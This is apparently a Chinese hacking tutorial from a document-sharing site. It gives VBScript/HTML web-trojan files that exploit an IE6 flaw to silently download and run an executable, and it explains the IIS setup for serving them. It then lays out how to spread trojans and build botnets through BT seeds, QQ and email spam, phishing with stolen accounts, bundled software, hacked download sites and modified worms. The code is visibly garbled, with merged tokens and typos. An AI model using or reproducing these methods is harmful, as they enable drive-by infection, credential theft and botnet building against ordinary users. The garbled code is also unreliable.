Hack速成一.docx

12px">【学网教程】

--文章画中画块幅-->

以前写了一篇文章，讲了关于怎样用最简单的方法获取对方的管理权限，里面用到了网页木马，最近有许多网友问我怎样制作网页木马，就这个问题我发表篇比较简单易懂的文章，希望大家珍惜我的劳动成果。

我们经常听到这样的忠告：

“不要随意下在不明的程序，不要随意打开邮件的附件...”这样的忠告确实是有用的，不过我们的系统有不少漏洞，许多木马已经不需要客户端和服务端了，他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能，有的木马会在你完全不知道的情况下潜入，现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子，也就是网页木马.

首先我们需要编写几个简单的文件

一。

名字为abc.abc的文件

＜html＞

＜script.language="vbscript"＞

FunctionHttpDoGet（url）

setReq=CreateObject（"Microsoft.XMLHTTP"）

oReq.open"GET",url,false

oReq.send

IfoReq.status=200then

HttpDoGet=oReq.respomseBody

SavefileHttpDoGet,"c:

\win.exe"

EndIf

SetReq=nothing

EndFunction

subSaveFile（str.fName）

SetbjStream=CreateObject（"ADODB.Stream"）

objStream.Type=1

objStream.Open

objStream.writestr

objStream.SaveToFilefName.2

objStream.Close（）

setbjStream=nothing

exewin（）

Endsub

Subexewin（）

setwshshell=createobject（"wscript.shell"）

a=wshshell.run（"cmd.exe/cc:

\win.exe",0）

b=wshshell.run（"cmd.exe/cdelc:

\win.hta",0）

window.close

EndSub

HttpDoGet"http:

//127.0.0.1/test.exe"

＜/script＞

＜/html＞

二。

名字为test.htm的文件

＜html＞＜body＞

木马运行测试！

（这句话可以改成你想说的）

＜objectdate="http:

//127.0.0.1/win.test";;;＞＜/object＞

＜/body＞＜/html＞

三。

名字为win.test的文件

＜html＞

＜body＞

＜script.language="vbscript"＞

FunctionHttpDoGet（url）

setReq=CreateObject（"Microsoft.XMLHTTP"）

oReq.open"GET",url,false

oReq.send

IfoReq.status=200then

HttpDoGet,"c:

\win.hta"

SetReq=nothing

Endif

endfunction

subSaveFile（str,fName）

Dimfso,tf

Setfso=CreateObject（Scripting.FileSystemObject"）

Settf=fso.CreateTextfile（fName,True）

tf.Writestr

tf.Close

exewin（）

Endsub

Subexewin（）

setwshshell=createobject（"wscript.shell"）

a=wshshell.run（"cmd.exe/cc:

\win.hat",0）

window.close

EndSub

HttpDoGet（"http:

//127.0.0.1/abc.abc"）

＜/script＞

＜/body＞

＜/html＞

四。

名字为test.exe的木马程序。

晕...这个就不用我提供了吧，你想用什么木马就把他的名字换成test.exe传上去就可以了。

服务器的文件列表

test.htm:

对外发布的网页

win.test:

下在文件abc.abc到对方机器上，并且保存为win.hta并且执行。

abc.abc下载二进制的木马文件test.exe，并执行

test.exe：

木马程序。

上面所说的文件可以修改成任意名字，只是不要忘记把源码里的文件指向也修改就可以了！

最后是设置IIS,打开“程序→管理工具→internet服务管理器”，右键单击要设置的站点，选择《属性》，在选择“http头”。

单击“MIME映射”里的“文件类型”按钮，并在关联扩展名文本框中输入“.hta”，在内容类型（MIME）中输入“application/hta",然后关闭所有窗口就可以了。

有许多朋友多遇见过，说什么赠送Q号或者玩网游的时候里面有人喊赠送好东东在XXX网址，其实那上面所说的例子用的就是这种原理，不知不觉中你机器上的所有有关于密码或者指定名词的东西全发送到对方指定的邮件箱里去了

看完后是否觉得这种木马太危险，甚至有种想把网线拔掉的感觉那？

呵呵，其实了解了网页木马的工作原理后我们就不难防护他，看完以上内容后就可以得出一个结论，网页木马主要利用IE的漏洞来实现的，所以在预防的时候一定要做到以下几点就可以保证上网的安全了，

A。

安装IE的最新版本并且随时下在才做系统和IE的补丁程序。

B。

不随便登陆不熟悉朋友送来的网站，对于熟悉的朋友也要小心哦。

C。

不随便登陆黑客网站（^_^黑基除外了啦，我担保的...），色情网站，尤其一些卖外挂，卖木马的网站。

D。

不随便打开和预览有附件的邮件。

E。

安装防火墙和杀毒软件的最新版本，经常进行升级和查毒

传播

本文章总节归纳了目前最流行的木马传播技术以及以后木马传播技术的发展趋势,

内容相当丰富.相信看完本教程你一定会成为养鸡专业户.

一.目前流行木马传播技术.

1.用BT制作木马种子

利用BT制作木马种子的教程网上也发布了很多,这里主要找一款具有诱惑性的软件

然后捆绑上自己的木马,做成种子,最后发布出去.相信利用BT抓鸡速度可是超快哦.

2.利用PP共享自己捆了木马的软件或电影.

方法同BT一样,要找诱惑性电影或软件,捆上自己的木马,然后共享自己的目录,这样人

家就会通过搜索找到你的软件或电影.这里电影要配合网页木马.可以参看RealOnePla

ye木马制作.在黑鹰可以找到.当你一打开我们的电影时就会打开我们制作过的网页木

马.这样看电影也会中我们的马.

3.利用QQ邮箱传播木马.

这里主要点HTML格式----在里面写上以下这段代码:

当人家一打开你发过去的邮件时,就会中我们的木马.

4.QQ群发网页木马。

首先，你要申请多个QQ号，然后找款QQ消息群发器（黑鹰网站可以找到大量相关QQ群

发信息软件，）再然后要加上非常具有诱惑性的消息（肉鸡的多与少与这个直接相关

，），骗取人家点你的网址。

最后，在晚上时可以挂在电脑上群发带有网页木马的信

息。

相信只要你的信息够诱惑，肉鸡也是成群的。

5.利用163邮箱传播网页木马。

同样，这里用HTML格式，然后填上以下代码：

frameborder="0">

对方只要一打开，就会中我们的网页木马。

这里发送邮件时注意一些技巧，我们要加入一些社会工程会。

比如对方是爱好车的，

你就在邮件标题上写上关于车的诱惑性标题。

目的只有一个，让他点我们带有网页木

马的邮件。

6.利用邮箱群发我们的网页木马。

这里要用到论坛邮箱提取器，这类工具黑鹰也有下载，大家可以找一下。

提取大量

邮箱后，配合FOXMAIL这款软件进行群发传播带有网页木马的邮件。

这里也要注意技

巧，比如在一个游戏论坛提取的邮箱，你就可以伪装本论坛发给广大游戏玩家,提供

最新游戏外挂下载.然后写上自己的网页木马.大部分都认为信息的真实性而点击.从

而中我们的木马.这里还可以配合利用HTML格式群发我们的网页木马效果可更佳!

7.捆绑欺骗

这也是比较常用的传播木马技术.把木马捆在游戏,流行软件上,配合以上方法,QQ,邮

箱,BT,论坛,等发布捆了木马的软件.骗取点我们的软件,这样也就同时中了我们的木

马.关于捆绑技术,本人做了三个非常具体详细的语音动画教程.不懂的可以在黑鹰查

找本人的捆绑系列专辑教程.

8.攻破下载点,捆上木马放入下载点.

当我们入侵到一些网站时,看看是否开放21服务,也就是是否提供FTP服务.若入侵到

这类网站,恭喜你,你又可以得到大批量肉鸡.你可以捆上自己的木马然后放入下载点

等待人家上钩吧!

该方法抓鸡的速度也非常快.

9.钓鱼式欺骗别人点击你的网页木马地址或木马.

钓鱼式欺骗攻击,也是国内最新发现的一种攻击手法.主要利用社会工程会中的信任

关系骗他点击.具体的利用方法:

当盗了人家的QQ号,你可以看看有几个群,然后在群里

放上自己捆绑的木马.接着在群里发几条诱惑性的信息,比如最新申请6位QQ号软件,

由于是在同一个群,可能他们对该QQ号主人有一定的信任度,所以点击的可能性一定

很大.若该QQ号主人是群主或是管理员,哈哈,我们来个更毒的,干脆在公告上写上自己

的网页木马地址,然后说本群刚建的专用网站!

由于是群主,他们对他的信任度可想而

知.应该都会点的吧!

还有一招,在他QQ的个人资料上或个人签名上填上自己的网页木

马,然后说刚建的个人网站.相信很多好友都会自动点击吧!

10.网站主页挂马

这个应该不用具体介绍吧,教程有N多.入侵到一个网站得到WEBSHELL后,接下来大家

是不是都忙着找首页挂马了.

11.论坛漏洞挂马

这里主要利用论坛的一些漏洞进行挂马,比如最近的动网前台提升管理员,然后挂马,

动网的个人资料过虑不严挂马,还有投票挂马等等.利用这些漏洞进行挂马.也有相关

教程,不是很清楚的可以在黑鹰找到.

12.文件类型伪装

这里主要把一些木马服务端和一些文本文件捆绑在一起,然后通后自解压方式或捆绑

器制作成文本文件类型的可执行文件.但他以为打开一个文本文件时,虽然能正常运行

文本文件,其实已经中了我们的木马.真是神不知鬼不觉!

本人也做过文件类型欺骗的

动画教程.不是很清楚的也可以在黑鹰或动画吧找到本人的相关的教程.当然,还要以

伪装成其它的类型,比如把木马制作成BMP图片.BAT格式等.只要他一运行就会中

我们的马.

14.其它的传播技术:

比如制作图片木马,也有专门的图片木马制作工具,RM木马制作

黑鹰也有相关教程,RealOnePlayer木马制作,FLASH木马制作.也有专门的制作工具,

网上可以找到相关工具.这些也是比较常用的传播技术.只要你有这方面的思路,都可

以在网上找到相关资料,自己尝试制作.

二.新型高级木马传播技术

下面介绍几种比较高级的木马传播技术.由于有一定的技术难度,所以隐蔽性比较强,

传播速度也快,而且也几乎不会被杀毒软件查杀.

1.在WORD文档中加入木马文件

这种方法非常隐蔽,在WORD文档尾加入木马文件,只要别人点击这个所谓的WORD文件就

会中木马,这种方法主要是通过把一个EXE格式的木马文件接在一个DOC文件的末尾,使

别人察觉不到木马的存在,因此使之上当受骗.具体实现方法,比较复杂.本人也在进一

步的研究之中.相信在不久这种方法就会流行起来.现在主要被一些高手使用.

2.黑客工具绑木马

其实这本来算不上高级的方法,但最近发现很多黑客软件发布站,捆了木马的工具躲过

管理员的检测.照样发布出来,想像危害性有多大.其实他们就是利用人性的弱点.黑客

工具本来被杀毒软件查杀,捆了木马的工具被查杀就不觉得奇怪了.就会放松警惕.从

而被他们利用.这一招是他们把黑客中的社会工程学利用的"恰到好处"!

3.用Z-file伪装加密木马程序

z-file伪装加密软件是台湾华顺科技产品,其经过将文件压缩加密之后,再以bmp图像

文件格式显示出来,扩展名是bmp,执行后是幅普通的图像.黑客会将木马程序和小游戏

合拼,再用z-file加密及将此"混合体"发给受害者,由于看上去是图像文件,受害者往

往不以为然,打开后又只是一般的图片,最可怕的地方还在于就连杀毒软件也检测不出

它内藏木马.

4.伪装成应用程序扩展组件

此类属于最难识别的特洛伊木马,也是骗术最高的木马,当然技术实现也有相当的难度

由于涉及到编程,所以我这里只简单介绍原理,以供参考.

采用内核插入式的嵌入方式,利用远程插入线程技术,嵌入DLL线程,或者挂接PSAPI,实

现木马程序的隐藏.

5.通过QQ病毒,QQ蠕虫,QQ尾巴或邮箱病毒,蠕虫进行传播.

相信利用这些技术进行传播木马的速度是最快的.这里要下载病毒,蠕虫源代码.进行

分析.修改.加入我们的网页木马地址.然后传播到网上,这样就会一传十,十传百,指数

级上升,自动为我们传播木马.这种传播速度是惊人的.网上也可找到相关QQ蠕虫制作

器,菜鸟朋友就可以直接制作自己的带有网页木马的蠕虫了.最近的唐山黑客就是利用

QQ尾巴传播自己的木马,感染并操控了四万多台民用电脑.进行对北京的一家音乐网站

进行分布式DDOS攻击.利用该技术是相当高级的,速度也是最快的.

文档加载中……请稍候！
如果长时间未打开，您也可以点击刷新试试。

下载文档到电脑，查找使用更方便

下载	加入VIP,免费下载

还剩页未读，继续阅读

举报
版权申诉 word格式文档无特别注明外均可编辑修改；预览文档经过压缩，下载后原文更清晰！ 立即下载

配套讲稿：

如PPT文件的首页显示word图标，表示该PPT已包含配套word讲稿。双击word图标可打开word文档。

特殊限制：

部分文档作品中含有的国旗、国徽等图片，仅作为作品整体效果示例展示，禁止商用。设计者仅对作品中独创性部分享有著作权。

关 键  词：

Hack 速成

  冰豆网所有资源均是用户自行上传分享，仅供网友学习交流，未经上传用户书面授权，请勿作他用。